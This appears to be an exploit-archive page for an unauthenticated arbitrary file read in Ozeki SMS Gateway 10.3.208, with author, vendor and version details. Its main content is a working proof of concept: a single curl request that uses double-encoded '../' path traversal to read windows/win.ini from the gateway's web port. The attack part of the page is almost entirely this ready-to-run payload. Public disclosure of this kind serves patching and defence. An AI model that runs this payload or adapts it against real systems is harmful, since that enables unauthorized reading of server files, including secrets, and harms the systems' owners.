Ozeki sms gateway 10.3.208 arbitrary file read (unauthenticated) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-08-04 | Type : webapps | Platform : multiple
This exploit / vulnerability Ozeki sms gateway 10.3.208 arbitrary file read (unauthenticated) is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

# Exploit Title: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)
# Date: 01.08.2023
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://ozeki-sms-gateway.com
# Software Link:
https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip
# Version: 10.3.208
# Tested on: Windows 10



##################################### Arbitrary File Read PoC
#####################################

curl
https://localhost:9515/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini

##################################### Arbitrary File Read PoC
#####################################